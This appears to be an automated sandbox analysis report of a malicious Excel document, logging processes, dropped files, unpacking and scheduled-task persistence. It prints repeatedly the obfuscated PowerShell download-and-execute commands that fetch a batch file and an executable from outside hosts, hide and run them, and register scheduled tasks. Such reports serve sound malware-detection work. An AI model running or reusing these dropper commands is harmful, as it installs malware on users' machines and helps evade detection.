          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\AppData\Roaming\sp.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\sp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\sp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: spetsifikatsiya.xlsVirustotal: Detection: 13%
          Source: sp.exeString found in binary or memory: id-cmc-addExtensions
          Source: sp.exeString found in binary or memory: set-addPolicy
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknownProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
          Source: unknownProcess created: C:\Windows\System32\mode.com mode 18,1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
          Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe'
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Users\user\AppData\Roaming\sp.exe {path}
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe'
          Source: C:\Users\user\AppData\Roaming\sp.exeProcess created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe'
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeProcess created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Roaming\sp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2105935712.0000000002740000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122976252.0000000002840000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101619089.00000000028E0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2153192487.00000000029B0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeUnpacked PE file: 31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeUnpacked PE file: 37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeUnpacked PE file: 31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeUnpacked PE file: 37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack
          .NET source code contains potential unpackerShow sources
          Source: sp.exe.23.dr, PuppetMaster/PuppetGUI.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: gUuYfpYBjYgU.exe.24.dr, PuppetMaster/PuppetGUI.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 24.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 24.2.sp.exe.bb0000.2.unpack, PuppetMaster/PuppetGUI.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 27.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 27.2.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 28.2.sp.exe.bb0000.2.unpack, PuppetMaster/PuppetGUI.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 28.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Obfuscated command line foundShow sources
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
          Suspicious powershell command line foundShow sources
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_004E6C16 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 24_2_009817AF pushad ; iretd
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_00682156 push ecx; ret
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_006B08FC push eax; ret
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_006B099C push ecx; ret
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0068118E push ecx; ret
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_0042BBAE push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_000B650A push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_000B60CC pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_000B4AD5 push edx; retf
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_0048780D push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_00482B7A pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 31_2_01F6AC61 push ebx; iretd
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 34_2_000B650A push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 34_2_000B60CC pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 34_2_000B4AD5 push edx; retf
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_0023650A push ecx; retf
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_002360CC pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_00234AD5 push edx; retf
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A780D push ebx; retf
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_001A2B7A pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 37_2_003EAC61 push ebx; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.53751279368
          Source: initial sampleStatic PE information: section name: .text entropy: 7.53751279368
          Source: initial sampleStatic PE information: section name: .text entropy: 7.53751279368
          Source: initial sampleStatic PE information: section name: .text entropy: 7.53751279368

          Persistence and Installation Behavior:

          barindex
          Tries to download and execute files (via powershell)Show sources
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
          Source: C:\Users\user\AppData\Roaming\sp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\sp.exeFile created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\sp.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeFile created: C:\Users\user\AppData\Roaming\JrekdQ.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\sp.exeFile created: C:\Users\user\AppData\Roaming\gUuYfpYBjYgU.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\sp.exeFile created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\sp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeFile opened: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe:Zone.Identifier read attributes | delete
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
